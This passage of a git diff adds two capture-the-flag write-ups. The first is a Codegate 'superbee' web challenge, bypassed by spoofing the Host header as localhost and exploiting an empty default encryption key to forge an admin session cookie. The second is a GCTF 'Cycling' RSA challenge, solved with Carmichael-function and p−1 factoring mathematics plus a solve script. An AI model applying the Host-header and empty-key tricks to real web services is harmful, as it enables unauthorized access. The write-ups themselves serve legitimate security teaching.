+2) /admin/authkey gives us AES-CBC-ENCRYPT(ptxt=auth_key, iv=PADDED(auth_crypt_key), key=PADDED(auth_crypt_key)) if the server’s domain is localhost.
In order to call endpoint 1 and get the flag, we need to get the auth_key. We can call endpoint 2 by simply manually setting the Host header to localhost. From there we need to compute
+AES-CBC-DECRYPT(ctxt=encrypted_auth_key, iv=PADDED(auth_crypt_key), key=PADDED(auth_crypt_key))
+Meaning we need to find out the auth_crypt_key. Since auth_crypt_key is read from the config but not actually stored there, it defaults to "". So by setting the session cookie to
+MD5("admin" + AES-CBC-DECRYPT(ctxt=encrypted_auth_key, iv=PADDED(""), key=PADDED("")))
+we can get the flag from endpoint 1.
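
The last step, turning the recovered auth_key into the cookie value, might look like the sketch below. It covers only the MD5 part: the AES-CBC decryption is omitted because the exact padding behind PADDED is not spelled out here, the hex encoding of the digest is an assumption, and `session_cookie` is a hypothetical helper.

```python
import hashlib

def session_cookie(auth_key: bytes) -> str:
    """MD5("admin" + auth_key) as a hex string (hex encoding is assumed)."""
    return hashlib.md5(b"admin" + auth_key).hexdigest()

# Placeholder value only; the real auth_key comes from decrypting the
# /admin/authkey response with the empty auth_crypt_key.
print(session_cookie(b"example-auth-key"))
```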
+
diff --git a/Codegate-2022-quals/web/superbee.md b/Codegate-2022-quals/web/superbee.md
new file mode 100755
index 0000000..759fd99
--- /dev/null
+++ b/Codegate-2022-quals/web/superbee.md
@@ -0,0 +1,35 @@
+# superbee
+
+**Author**: Andris
+
+**Tags:** web
+
+**Points:** 100 (89 solves)
+
+We have an API with the following relevant endpoints:
+1) `/main/index` gives us the flag provided that we have the session cookie set to `MD5("admin" + auth_key)`.
+2) `/admin/authkey` gives us `AES-CBC-ENCRYPT(ptxt=auth_key, iv=PADDED(auth_crypt_key), key=PADDED(auth_crypt_key))` if the server's domain is `localhost`.
+
+We are also given this config
+```
+app_name = superbee
+auth_key = [----------REDEACTED------------]
+id = admin
+password = [----------REDEACTED------------]
+flag = [----------REDEACTED------------]
+```
+which is loaded as follows.
+```
+app_name, _ = web.AppConfig.String("app_name")
+auth_key, _ = web.AppConfig.String("auth_key")
+auth_crypt_key, _ = web.AppConfig.String("auth_crypt_key")
+admin_id, _ = web.AppConfig.String("id")
+admin_pw, _ = web.AppConfig.String("password")
+flag, _ = web.AppConfig.String("flag")
+```
+
+In order to call endpoint 1 and get the flag, we need to get the auth_key. We can call endpoint 2 by simply manually setting the `Host` header to `localhost`. From there we need to compute
+`AES-CBC-DECRYPT(ctxt=encrypted_auth_key, iv=PADDED(auth_crypt_key), key=PADDED(auth_crypt_key))`
+Meaning we need to find out the `auth_crypt_key`. Since `auth_crypt_key` is read from the config but not actually stored there, it defaults to `""`. So by setting the session cookie to
+`MD5("admin" + AES-CBC-DECRYPT(ctxt=encrypted_auth_key, iv=PADDED(""), key=PADDED("")))`
+we can get the flag from endpoint 1.
\ No newline at end of file
diff --git a/GCTF-2022/crypto/cycling.html b/GCTF-2022/crypto/cycling.html
new file mode 100755
index 0000000..c6ecfb3
--- /dev/null
+++ b/GCTF-2022/crypto/cycling.html
@@ -0,0 +1,474 @@
+Cycling | Organisers
It is well known that any RSA encryption can be undone by just encrypting the ciphertext over and over again.
+If the RSA modulus has been chosen badly then the number of encryptions necessary to undo an encryption is small.
+However, if the modulus is well chosen then a cycle attack can take much longer. This property can be used for a timed release of a message.
+We have confirmed that it takes a whopping 2^1025-3 encryptions to decrypt the flag.
+Pack out your quantum computer and perform 2^1025-3 encryptions to solve this challenge. Good luck doing this in 48h.
+
+
+
Exploring the challenge
+
+
Let’s have a brief look at the source code we’re provided with:
In short, we’re faced with an RSA encryption of the flag, and one additional “fact” that’s supposed to help us in some way.
+The fact is that when we repeat the encrypting exponentiation $R = 2^{1025} - 3$ times, we achieve the same as decrypting the ciphertext.
+Working through the math, this tells us that $x^{e^{R}} \equiv x$ holds, at the very least when $x$ represents the flag.
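
The cycling idea is easy to try on a toy modulus. The sketch below uses the textbook-sized parameters $n = 61 \cdot 53$, $e = 17$, which are unrelated to the challenge values, and a hypothetical helper `cycle_attack`; it keeps encrypting until the ciphertext reappears, at which point the previous value is the plaintext.

```python
def cycle_attack(c, e, n):
    """Re-encrypt c until it shows up again; return (plaintext, cycle length)."""
    prev, cur = c, pow(c, e, n)
    steps = 1
    while cur != c:
        prev, cur = cur, pow(cur, e, n)
        steps += 1
    # cur == c again, so prev ** e == c (mod n): prev is the plaintext.
    return prev, steps

n, e, m = 61 * 53, 17, 65
c = pow(m, e, n)
recovered, steps = cycle_attack(c, e, n)
print(recovered, steps)
```

Here `steps` plays the role of $R + 1$: after `steps - 1` encryptions of the ciphertext we are back at the plaintext.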
+
+
A well-known fact when dealing with RSA, and modular exponentiation in general, is that the order of the multiplicative group mod $n$ is equal to the number of integers $< n$ that are coprime to $n$.
+This quantity is known as Euler’s totient $\varphi(n)$.
+
+
Furthermore, from Euler’s theorem (or Lagrange’s theorem if we frame it in a group-theoretic way), we know that any number $x$ coprime to $n$, taken to the $\varphi(n)$th power (mod $n$), results in the identity $1$.
+This property is in fact vital for the correctness of RSA, as we rely on the fact that $x^{\varphi(n)} \equiv 1 \pmod n$ when we say that $x^{ed} \equiv \left(x^{\varphi(n)}\right)^k x \equiv x$.
+
+
From all this known theory underlying the RSA cryptosystem, we can now finally make a first deduction: $e^{R + 1} \equiv 1 \pmod{\varphi(n)}$.
+
+
Background: Carmichael’s $\lambda$
+
+
Actually, that previous statement is what you would say with a basic understanding of the principles underlying RSA, but it’s in fact not entirely correct.
+It could very well be the case that $x^\ell \equiv 1 \pmod n$ for $\ell < \varphi(n)$.
+Moreover, this will be the case for every $x$ when $n = pq$ is an RSA modulus.
+One thing that Lagrange’s theorem will still give us, even when $\ell \ne \varphi(n)$, is that $\ell \mid \varphi(n)$.[^1]
+
+
The smallest exponent such that $x^\ell \equiv 1 \pmod n$ for all $x$ is known as the Carmichael function $\lambda(n)$.
+We know that $\lambda(n) \mid \varphi(n)$, but we can even write down a nicer formula:[^2]
Returning to our wrong statement from before, we now know that $e^{R + 1} \equiv 1 \pmod \ell$ where $\ell \mid \lambda(n)$, and furthermore, since $e$ doesn’t look too suspicious, nor can a readable flag be influenced all that much, we can in fact hope that $e^{R + 1} \equiv 1 \pmod{\lambda(n)}$.
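
For a two-prime modulus $n = pq$, the Carmichael function is $\lambda(n) = \operatorname{lcm}(p - 1, q - 1)$. The following check on the toy modulus $n = 61 \cdot 53$ (not the challenge modulus) illustrates that $\lambda(n)$ is a proper divisor of $\varphi(n)$ and still sends every unit to $1$.

```python
from math import gcd

def lcm(a, b):
    return a // gcd(a, b) * b

p, q = 61, 53
n = p * q
phi = (p - 1) * (q - 1)   # Euler's totient of n
lam = lcm(p - 1, q - 1)   # Carmichael's lambda of n

units = [x for x in range(1, n) if gcd(x, n) == 1]
everything_is_one = all(pow(x, lam, n) == 1 for x in units)
print(phi, lam, everything_is_one)
```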
+
+
Factors of factors of factors; and some subtractions
+
+
Now that we understand the nuances of the formula $x^\ell \equiv 1$ a bit better, we can think further towards solving this challenge.
+Remember what we wrote down earlier?
+
+\[e^{R + 1} \equiv 1 \pmod{\lambda(n)}\]
+
+
This tells us something more, since we have exactly the form of statement that led us to introducing $\lambda(n)$ in the first place.
+We could now say that $R + 1 \mid \lambda(\lambda(n))$, which gives us a somewhat nice relation between the value $R$ we’d been given, and our RSA modulus $n$.
+
+
Let’s not worry about the possibility that $R + 1$ is only a divisor, and instead assume that it holds with equality $R + 1 = \lambda(\lambda(n))$.
+Then we can try to write down what we expect $R + 1$ to be:[^3]
We now would like to relate these values $s_i - 1$ to $R$ somehow.
+By the above, it should be clear that any $s_i - 1 \mid R + 1$, so when we list all divisors of $R + 1$ in turn, and add $1$ to them, we should end up with a set of candidates $\mathcal{C}$, such that $\{s_i\}_i \subseteq \mathcal{C}$.
+The value $R + 1$ itself is not particularly easy to factor in a short amount of time, but luckily it’s not an esoteric, unknown value, but a nicely structured one.
+And, as often happens with nicely structured values, it shows up on factordb.
+
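The construction of the candidate set can be illustrated on the same toy scale. The following sketch assumes we were handed the factorization $30 = 2 \times 3 \times 5$ of $\lambda(\lambda(989))$ instead of the factordb result; `is_prime` and `candidates` are our own hypothetical helpers.

```python
from itertools import combinations
from math import prod

def is_prime(v):
    """Naive primality test by trial division. Toy sizes only."""
    if v < 2:
        return False
    d = 2
    while d * d <= v:
        if v % d == 0:
            return False
        d += 1
    return True

def candidates(prime_factors):
    """All primes of the form (product of a subset of prime_factors) + 1."""
    found = set()
    for r in range(len(prime_factors) + 1):
        for subset in combinations(prime_factors, r):
            v = prod(subset) + 1  # the empty subset has product 1
            if is_prime(v):
                found.add(v)
    return sorted(found)

# Toy setting: n = 989 = 23 * 43, lambda(n) = 462 = 2 * 3 * 7 * 11,
# and lambda(lambda(n)) = 30 = 2 * 3 * 5 plays the role of R + 1.
C = candidates([2, 3, 5])
print(C)  # [2, 3, 7, 11, 31]

# Every prime factor of lambda(n) is among the candidates, plus one impostor (31).
assert {2, 3, 7, 11} <= set(C)
```

The impostor $31$ shows why $\mathcal{C}$ is only a superset: a divisor plus one being prime does not mean it actually divides $\lambda(n)$.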
+
Who cares if it’s not the private key? It works
+
+
With the set $\mathcal{C}$, what could we do?
+One option to consider is applying the same trick again, but using $\mathcal{C}$ rather than the factorization of $R + 1$, to recover $p$ and $q$.
+Annoyingly, $\mathcal{C}$ is a rather large set, and enumerating all subsets of it takes exponential time, so we’ll have to throw that idea out.
+
+
Instead, let’s look back at our initial, more naive, understanding of the RSA cryptosystem, where we used $\varphi(n)$ rather than $\lambda(n)$ to compute the decryption exponent $d = e^{-1} \pmod{\varphi(n)}$.
+Even though we didn’t have the smallest modulus possible, we still had full correctness, since — as we know by now — $\lambda(n) \mid \varphi(n)$.
+We can take that to the extreme: we know/assume that all prime factors $s_i$ of $\lambda(n)$ are among our candidates in $\mathcal{C}$, so if we simply take $\Xi = \prod_{c \in \mathcal{C}} c$, it should hold that $\lambda(n) \mid \Xi$ (recall that we assumed $\lambda(n)$ to be square-free), and as such, we could use $\Xi$ as a “replacement” for $\lambda(n)$ or $\varphi(n)$ when it comes to computing a decryption exponent.
+
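A quick sanity check of this idea, again on toy numbers of our own choosing: with $n = 989$ and the candidate set $\{2, 3, 7, 11, 31\}$ from a divisor enumeration of $30$, the product $\Xi$ is a multiple of $\lambda(n) = 462$, so inverting $e$ modulo $\Xi$ should decrypt everything.

```python
from math import gcd, prod

n = 989                # toy modulus 23 * 43, lambda(n) = 462
C = [2, 3, 7, 11, 31]  # candidate primes; 31 is not a factor of lambda(n)
Xi = prod(C)           # 14322 = 31 * 462, a multiple of lambda(n)
e = 5                  # hypothetical public exponent

assert Xi % 462 == 0
assert gcd(e, Xi) == 1  # needed for the inverse to exist

d = pow(e, -1, Xi)      # not *the* private key, but good enough

# e * d = 1 (mod lambda(n)) still holds, so every message round-trips
assert (e * d) % 462 == 1
assert all(pow(pow(m, e, n), d, n) == m for m in range(n))
```

Note that this only works when $e$ happens to be coprime to $\Xi$. If $e$ itself ended up in $\mathcal{C}$ without dividing $\lambda(n)$, it would have to be left out of the product.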
+
With this, we have enough ideas and information to finally solve this challenge.[^4]
+
+
+
CTF{Recycling_Is_Great}
+
+
+
All your factorbase are belong to us
+
+
The official intended solution relies on similar observations, but instead of finding some number $k\lambda(n)$, it uses those potential factors of $\lambda(n)$ to directly factor the modulus $n$.[^5]
+To understand how this factorization works, we look back at a well-known, simple special-purpose factoring algorithm: Pollard’s p - 1 algorithm.
+
+
Pollard’s algorithm allows finding a factor $p$ (say for $n = pq$) under the assumption that $p - 1$ is $B$-powersmooth.
+That is, all prime power divisors $s^r \mid p - 1$ are bounded by $s^r < B$.
+This property enables us to find some product $M$ of prime powers less than $B$, such that $p - 1 \mid M$ but $q - 1 \nmid M$.
+In turn, looking at Fermat’s little theorem, we can see that for all $a$ coprime to $p$, it holds that $a^M \equiv 1 \pmod p$, but it will often be the case that $a^M \not\equiv 1 \pmod q$, and so computing $\gcd(a^M - 1, n)$ should allow us to recover $p$.
+Traditionally, Pollard’s method computes $a^M \pmod n$ by repeatedly taking $s$th powers of an accumulator and testing whether the $\gcd$ results in a factorization.
+The advantage of this is twofold: one doesn’t need to compute $M$ in its entirety,[^6] and as long as the largest factor of $p - 1$ differs from the largest factor of $q - 1$,[^7] the method will still work, rather than yielding $n$ as the $\gcd$.
+
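For readers who haven’t seen it spelled out, a textbook-style sketch of the incremental p - 1 method could look as follows. This is our own minimal version with hypothetical helper names, not the code from the official solution, and the example modulus $299 = 13 \times 23$ is chosen so that $13 - 1 = 2^2 \times 3$ is $5$-powersmooth while $23 - 1 = 2 \times 11$ is not.

```python
from math import gcd

def small_primes(bound):
    """Primes <= bound via a simple sieve of Eratosthenes."""
    sieve = [True] * (bound + 1)
    sieve[0:2] = [False, False]
    for i in range(2, int(bound ** 0.5) + 1):
        if sieve[i]:
            for j in range(i * i, bound + 1, i):
                sieve[j] = False
    return [i for i, flag in enumerate(sieve) if flag]

def pollard_p_minus_1(n, bound, a=2):
    """Try to split n, assuming some prime factor p has a bound-powersmooth p - 1."""
    acc = a
    for s in small_primes(bound):
        # largest power of s that does not exceed the bound
        power = s
        while power * s <= bound:
            power *= s
        acc = pow(acc, power, n)
        # test after every step, so we stop before both factors are "hit"
        g = gcd(acc - 1, n)
        if 1 < g < n:
            return g
    return None

print(pollard_p_minus_1(299, 5))  # 13
```

Here the accumulator reaches $2^{12}$ after processing the primes $2$ and $3$, which is already $1$ modulo $13$ but not modulo $23$.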
+
To abstract the bound $B$ away, we simply notice that all it gives us is some superset $\mathcal{C}$ of prime (power) factors of $p - 1$.
+This is exactly what we already found by enumerating primes $s_i$ such that $s_i - 1 \mid R + 1$!
+If we call such a set $\mathcal{C}$ a factor base, and slightly generalize Pollard’s algorithm, we can apply it to our situation as well.
+And this is exactly the approach we see in the official solution script: we take some base $a$ (there called $m$), repeatedly exponentiate it by potential prime factors, and check whether the updated value $a'$ satisfies $\gcd(a' - 1, n) \notin \{1, n\}$.
+
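The generalization to an arbitrary factor base is a small change to the classic loop. The sketch below is our own paraphrase of the idea rather than a copy of the official script. It reuses the toy modulus $989 = 23 \times 43$ together with the candidate set obtained from the divisors of $30$.

```python
from math import gcd

def factor_with_base(n, factor_base, a=2):
    """p - 1 style factoring where the exponents come from a given factor base."""
    acc = a
    for s in factor_base:
        acc = pow(acc, s, n)
        g = gcd(acc - 1, n)
        if 1 < g < n:
            return g
    return None  # either the base is insufficient, or both factors were hit at once

n = 989                          # toy modulus: 23 * 43
factor_base = [2, 3, 7, 11, 31]  # primes c with (c - 1) | 30
f = factor_with_base(n, factor_base)
assert f is not None and n % f == 0
print(f, n // f)  # 43 23
```

With this ordering, the exponent $2 \times 3 \times 7 = 42 = 43 - 1$ is completed before the factor $11$ of $23 - 1$ is processed, so the $\gcd$ isolates $43$. A different ordering of the factor base may find $23$ first instead.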
+
Once a factorization of $n$ is found, it is of course only a matter of performing regular RSA decryption to obtain the flag.
+
+
Does this always work?
+
+
Until now, we’ve made several assumptions that turned out to be correct, in order to solve this challenge.
+Even the official solution turns out to rely on those assumptions,[^8] so we’d like to have a look at how much trouble we’d be in if the assumptions were violated.
+To restate our assumptions more explicitly:
+
+
+
1. $R + 1 = \lambda(\lambda(n))$
   - The inner $\lambda$ corresponds to the multiplicative order of the flag, $|m| \pmod n$
   - The outer $\lambda$ corresponds to the multiplicative order of $e$, modulo $|m|$
2. $p - 1$ and $q - 1$ are square-free, that is, none of their prime factors occur with multiplicity $> 1$.
3. All $s_i - 1$ are square-free, where $s_i \mid \lambda(n)$, but this has been confirmed by the factorization of $R + 1$
+
+
+
And let’s also introduce some counterexamples for all of these, where our assumption is violated and our solution breaks:
+
+
+
1. We explore the possibility for both $\lambda$s:
   - Let $n = 77$, then $\lambda(n) = \mathrm{lcm}(6, 10) = 30$, but for the message $m = 15$, it’s already true that $m^5 \equiv 1 \pmod n$, rather than the expected $m^{30}$.
     This in turn implies that we only need $e^{R + 1} \equiv 1 \pmod 5$ to completely decrypt this message by cycling.
   - We now use $n = 989 = 23\times43$, so $\lambda(n) = 2\times3\times7\times11 = 462$ and $\lambda(\lambda(n)) = \mathrm{lcm}(2, 6, 10) = 30$, but for instance $e = 379$ only has multiplicative order $5$ modulo $\lambda(n)$.
2. Consider $n = 163\times67 = 10921$, then $\lambda(n) = \mathrm{lcm}(2\times3^4, 2\times3\times11) = 2\times3^4\times11 = 1782$.
   $\lambda(\lambda(n))$ would then be $2\times3^3\times5$, and we’d never pick up $3^4$ as a potential factor out of any subset.
3. Similar issues to the earlier point occur, except they are introduced slightly later in the process of computing $\lambda(\lambda(n))$.
+
+
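The numbers in these counterexamples are small enough to verify directly. The following sketch simply re-checks the arithmetic with plain Python; `multiplicative_order` is our own brute-force helper.

```python
from math import lcm

def multiplicative_order(a, modulus):
    """Smallest k >= 1 with a^k = 1 (mod modulus); assumes gcd(a, modulus) == 1."""
    k, x = 1, a % modulus
    while x != 1:
        x = x * a % modulus
        k += 1
    return k

# Counterexample 1, inner lambda: m = 15 has order 5 modulo 77, not 30
assert lcm(7 - 1, 11 - 1) == 30
assert multiplicative_order(15, 77) == 5

# Counterexample 1, outer lambda: e = 379 has order 5 modulo lambda(989) = 462
assert 23 * 43 == 989
assert lcm(23 - 1, 43 - 1) == 462 == 2 * 3 * 7 * 11
assert lcm(2 - 1, 3 - 1, 7 - 1, 11 - 1) == 30
assert multiplicative_order(379, 462) == 5

# Counterexample 2: lambda(n) contains 3^4, but lambda(lambda(n)) only shows 3^3
assert 163 * 67 == 10921
lam = lcm(163 - 1, 67 - 1)
assert lam == 1782 == 2 * 3**4 * 11
# lambda(2) = 1, lambda(3^4) = 3^3 * 2, lambda(11) = 10
lam_lam = lcm(1, 3**3 * 2, 10)
assert lam_lam == 270 == 2 * 3**3 * 5
```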
+
Other than those assumptions, there are some more things that can go wrong.
+We’ve relied on enumerating all subsets of factors of $R + 1$, but, as we remarked when discarding the idea of repeating such an enumeration on its own result, that takes exponential time in the number of factors.
+If we end up with a large number of these factors, we might in fact already get in trouble trying to enumerate all subsets, and spend a long time waiting for that.[^9]
+On the flip side of that coin, to obtain that initial list of factors, we need to be able to factor this value $R + 1$.
+Now, if we consider for instance the worst case, where $p$ and $q$ are what we could call doubly-safe primes, i.e. $p = 2(2p' + 1) + 1$ where $p$ and $\frac{p - 1}{2}$ are both safe primes, there’s only a minor difference in number of bits between $n$ and $\lambda(\lambda(n)) = 2p'q'$, and the latter is, up to the factor $2$, even a new RSA modulus.
+By assumed security of RSA (unless you get extra information like in this challenge), factoring that would not be feasible.
+
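As a toy-sized illustration of this worst case (the concrete primes are our own choice, not taken from the challenge), take $p' = 5$ and $q' = 11$, so that $5, 11, 23$ and $11, 23, 47$ are chains of primes:

\[\begin{aligned}
p &= 2(2 \cdot 5 + 1) + 1 = 23, \qquad q = 2(2 \cdot 11 + 1) + 1 = 47, \qquad n = 23 \cdot 47 = 1081 \\
\lambda(n) &= \mathrm{lcm}(22, 46) = 2 \cdot 11 \cdot 23 = 506 \\
\lambda(\lambda(n)) &= \mathrm{lcm}(1, 10, 22) = 110 = 2 \cdot 5 \cdot 11 = 2p'q'
\end{aligned}\]

Factoring $\lambda(\lambda(n))$ then amounts to recovering $p'$ and $q'$, which at realistic sizes is just another RSA-style factoring problem.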
+
Can we fix it?
+
+
+
Yes we can!
+
+
+
Sort of, at least.
+Unless my very vague notion from the footnote in the previous section pans out, I don’t expect we could get around the exponential time enumeration, or the factoring problems.
+We can however try to fix up some of the problems our assumptions brought along, and get a slightly more generic solution.
+
+
Let’s first look at the case where $|m| < \lambda(n)$.
+Since for our original approach, we only care about $m$ itself, and not about factoring, we only need to find a multiple of $|m|$, which we still get from our powerset enumeration (under the assumption, for now, that we get $\lambda(|m|)$).
+This means we can still compute an effective decryption exponent that works for $m$ itself, and any element with an order dividing $|m|$.
+Moreover, we can still use this to fully factor $n$ too.
+Once we decrypt $m$, we know that $m^{k|m|} \equiv 1 \pmod n$, which means we can again apply our p - 1 approach with a factor base to find an exponent $M$ such that $m^M \equiv 1 \pmod p$.
+Note that we require the use of $m$ as basis here, rather than an arbitrary number $a$.
+The only condition under which this will still necessarily fail is when $|m|$ divides $\gcd(p - 1, q - 1)$, since then any exponent such that $m^M \equiv 1 \pmod p$ also satisfies $m^M \equiv 1 \pmod q$.[^10]
+
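The earlier counterexample $n = 77$, $m = 15$ makes for a compact demonstration of this case. In the sketch below, the exponent $e = 3$ is a hypothetical choice of ours, and we pretend to only know the order $|m| = 5$ rather than $\lambda(n) = 30$.

```python
from math import gcd

n, m, order_m = 77, 15, 5  # 15^5 = 1 (mod 77), although lambda(77) = 30
e = 3                      # hypothetical public exponent

c = pow(m, e, n)
d = pow(e, -1, order_m)    # inverse modulo |m| only, not modulo lambda(n)

# Good enough to decrypt this particular message ...
assert pow(c, d, n) == m
# ... but not a valid decryption exponent for arbitrary messages
assert pow(pow(2, e, n), d, n) != 2

# With m as base, a partial exponent already separates the primes:
# 15 = 1 (mod 7), so M = 1 works modulo 7 but not modulo 11.
g = gcd(m - 1, n)
assert g == 7

# An arbitrary base carries no such guarantee for exponents built from |m|
assert gcd(pow(2, order_m, n) - 1, n) == 1
```

The last assertion is the reason for insisting on $m$ as the base: only for $m$ do we know that some exponent assembled from our factor base annihilates it modulo $p$.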
+
Next, we investigate the case where $R + 1 \ne \lambda(|m|)$.
+Unfortunately, the solution here isn’t quite as clean.
+When the order of $e$ is too small, we simply lack the information to recover enough primes.
+When the order of $e$ is only slightly too small, we should be able to salvage it with only a constant cost to our computation time.
+Pick a fixed-size (multi)set of small primes $\mathcal{P}$, and let $\mathcal{C}’ = \mathcal{C} \cup \mathcal{P}$.
+This increases the computation time by a factor of $2^{|\mathcal{P}|}$, but as long as the “lost” factor of $\lambda(|m|)$ is factorable over $\mathcal{P}$, our algorithm works again.
+Optionally, if we would like to deal with more complex situations, we could also construct more complex ways to add extra factors.
+For example, an approach comparable to the “two-stage” variant of the p - 1 algorithm is possible, where we take e.g. at most 4 “small” primes and 1 “medium” sized extra prime.
+
+
Finally, how can we deal with the annoyance of prime powers?
+To deal with prime power divisors of $\lambda(n)$, it’s possible to apply a strategy similar to the p - 1 factoring algorithm, where every prime factor is simply included multiple times.
+Since exponents larger than $2$ can be detected in the factorization of $R + 1$, we recommend including each factor twice, unless evidence to the contrary is present from the factorization of $R + 1$.[^11]
+The more conservative approach would be to include each prime $s$ a number of times proportional to $\frac{\log(n)}{\log(s)}$, which comes at an obvious computational cost.
+For the prime power divisors of $\lambda(\lambda(n))$, we’ll need to do just a bit more work.
+If we see a prime power $s^r$ when factoring $R + 1$, it should be clear from how $\lambda$ works that we expect to also see the factors of $s - 1$ appear.
+In that case, it’s obvious that $s^{r + 1}$ should be in $\mathcal{C}$.
+When however $s^2 \mid s_i$, we only see $s$ and the factors of $s - 1$ appear when factoring $R + 1$.
+Hence, when we add a prime to $\mathcal{C}$ that still divides $R + 1$, we should add it with a higher multiplicity.
+
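One possible reading of this multiplicity rule, sketched on the counterexample $n = 163 \times 67$ from before: every candidate prime $c$ gets exponent $1 + v_c(R + 1)$, where $v_c$ counts how often $c$ divides $R + 1$. The helper names and the exponent $e = 5$ are our own assumptions, and we take $R + 1 = \lambda(\lambda(n)) = 270$ as given.

```python
from math import prod

def valuation(value, p):
    """Largest k such that p^k divides value."""
    count = 0
    while value % p == 0:
        value //= p
        count += 1
    return count

n = 163 * 67                     # lambda(n) = 2 * 3^4 * 11 = 1782
R_plus_1 = 270                   # lambda(lambda(n)) = 2 * 3^3 * 5
C = [2, 3, 7, 11, 19, 31, 271]   # primes c with (c - 1) | 270
e = 5                            # hypothetical public exponent

def decrypts_everything(modulus_guess):
    """Check whether inverting e modulo modulus_guess decrypts every message."""
    d = pow(e, -1, modulus_guess)
    return all(pow(pow(m, e, n), d, n) == m for m in range(n))

# Plain product: misses 3^4 and fails for some messages
naive = prod(C)
assert not decrypts_everything(naive)

# Primes that still divide R + 1 get a higher multiplicity
weighted = prod(c ** (1 + valuation(R_plus_1, c)) for c in C)
assert weighted % 1782 == 0
assert decrypts_everything(weighted)
```

The price is a larger $\Xi$, and a slightly higher chance that $e$ is no longer coprime to it.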
+
Talk is cheap, show me the code
+
+
We present here the code as we implemented it during the CTF.
+That is, making maximal assumptions such that it still gets the flag.
+The code for factorization based on Pollard’s p - 1 algorithm can be found in the official solution.
+Interested readers are encouraged to understand, implement and share the suggested improvements of this article :)
+
+
proof.all(False) # speed up primality checking a bit
+import itertools
+from Crypto.Util.number import long_to_bytes
+
+# From the itertools documentation/example
+def powerset(iterable):
+    "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
+    s = list(iterable)
+    return itertools.chain.from_iterable(itertools.combinations(s, r) for r in range(len(s)+1))
+
+# From factordb
+factors = [2, 3, 5, 17, 257, 641, 65537, 274177, 2424833, 6700417, 67280421310721, 1238926361552897, 59649589127497217, 5704689200685129054721, 7455602825647884208337395736200454918783366342657, (2^256+1)//1238926361552897, (2^512+1)//18078591766524236008555392315198157702078226558764001281]
+assert 2**1025-2 == prod(factors)
+
+C = []
+for ps in powerset(factors):
+    v = prod(ps) + 1  # candidate: (divisor of R + 1) + 1
+    if is_prime(v):
+        C.append(v)
+Ξ = prod(C)
+
+e = 65537
+n = 0x99efa9177387907eb3f74dc09a4d7a93abf6ceb7ee102c689ecd0998975cede29f3ca951feb5adfb9282879cc666e22dcafc07d7f89d762b9ad5532042c79060cdb022703d790421a7f6a76a50cceb635ad1b5d78510adf8c6ff9645a1b179e965358e10fe3dd5f82744773360270b6fa62d972d196a810e152f1285e0b8b26f5d54991d0539a13e655d752bd71963f822affc7a03e946cea2c4ef65bf94706f20b79d672e64e8faac45172c4130bfeca9bef71ed8c0c9e2aa0a1d6d47239960f90ef25b337255bac9c452cb019a44115b0437726a9adef10a028f1e1263c97c14a1d7cd58a8994832e764ffbfcc05ec8ed3269bb0569278eea0550548b552b1
+ct = 0x339be515121dab503106cd190897382149e032a76a1ca0eec74f2c8c74560b00dffc0ad65ee4df4f47b2c9810d93e8579517692268c821c6724946438a9744a2a95510d529f0e0195a2660abd057d3f6a59df3a1c9a116f76d53900e2a715dfe5525228e832c02fd07b8dac0d488cca269e0dbb74047cf7a5e64a06a443f7d580ee28c5d41d5ede3604825eba31985e96575df2bcc2fefd0c77f2033c04008be9746a0935338434c16d5a68d1338eabdcf0170ac19a27ec832bf0a353934570abd48b1fe31bc9a4bb99428d1fbab726b284aec27522efb9527ddce1106ba6a480c65f9332c5b2a3c727a2cca6d6951b09c7c28ed0474fdc6a945076524877680
+
+d = pow(e, -1, Ξ)
+print(long_to_bytes(int(pow(ct, d, n))))
+
[^2]: For simplicity, we restrict the choices of $p_i^{r_i}$ here to those values where $p_i \ne 2$ or $r_i < 3$, see e.g. the wikipedia page for the full details.
+
[^3]: Yet another minor assumption is introduced here, that none of the prime factors we deal with has a higher power than $1$. As we’ll be able to observe from the factorization of $R + 1$ later, this doesn’t seem too unlikely.
+
[^4]: […] for the first time. We’ll also look at the intended solution after this, which takes a somewhat similar approach initially, but then applies it to factoring $n$ directly.
+
[^5]: In this script, we can also observe a clean explanation of why $R + 1$ can be easily factored or found on factordb: $R + 1 = 2(2^{1024} - 1)$ is twice a Mersenne number.
+
[^6]: Computing all of $M$ would result in a potentially huge number that is unwieldy to work with.
+
[^7]: Alternatively, we could reorder the factors in question, replace the notion of “largest” by “latest in the reordered sequence”, though that is less practical from an implementation point of view.
+
[^8]: After the end of the CTF, one of the organizers clarified that the challenge description should rather have stated that the given number of repetitions works for any exponent $e$.
+
[^9]: This does make me wonder if some other modification of e.g. the p - 1 algorithm might be able to deal with this issue, but so far I’ve been unable to come up with a proper adaptation. I’m always open to comments or ideas if you happen to have any on this topic.
+
[^10]: Taken to the extreme, we might suddenly be able to factorize again, when e.g. $m^2 \equiv 1 \pmod n$.
+
[^11]: One exception here might be for powers of $2$, since that’s always the oddest prime, and it behaves differently when computing $\lambda$.
+
+
+
diff --git a/GCTF-2022/crypto/cycling.md b/GCTF-2022/crypto/cycling.md
new file mode 100755
index 0000000..77da300
--- /dev/null
+++ b/GCTF-2022/crypto/cycling.md
@@ -0,0 +1,253 @@
+# Cycling
+
+**Author**: Robin_Jadoul
+
+**Tags**: RSA, factoring
+
+**Points**: 201 (50 solves)
+
+**Alternate URL**:
+
+**Description**:
+
+> It is well known that any RSA encryption can be undone by just encrypting the ciphertext over and over again.
+> If the RSA modulus has been chosen badly then the number of encryptions necessary to undo an encryption is small.
+> However, if the modulus is well chosen then a cycle attack can take much longer. This property can be used for a timed release of a message.
+> We have confirmed that it takes a whopping 2^1025-3 encryptions to decrypt the flag.
+> Pack out your quantum computer and perform 2^1025-3 encryptions to solve this challenge. Good luck doing this in 48h.
+
+
+## Exploring the challenge
+
+Let's have a brief look at the source code we're provided with:
+
+```python
+e = 65537
+n = ... # snip
+ct = ... # snip
+# Decryption via cycling:
+pt = ct
+for _ in range(2**1025 - 3):
+    pt = pow(pt, e, n)
+# Assert decryption worked:
+assert ct == pow(pt, e, n)
+
+# Print flag:
+print(pt.to_bytes((pt.bit_length() + 7)//8, 'big').decode())
+```
+
+In short, we're faced with an RSA encryption of the flag, and one additional "fact" that's supposed to help us in some way.
+The fact is that when we repeat the encrypting exponentiation $R = 2^{1025} - 3$ times on the ciphertext, we achieve the same as decrypting it.
+Working through the math, and counting the one encryption that produced the ciphertext in the first place, this tells us that $x^{e^{R + 1}} \equiv x$ holds, at the very least when $x$ represents the flag.
+
+A well-known fact when dealing with RSA, and modular exponentiation in general, is that the order of the multiplicative group mod $n$ is equal to the number of integers $< n$ that are coprime to $n$.
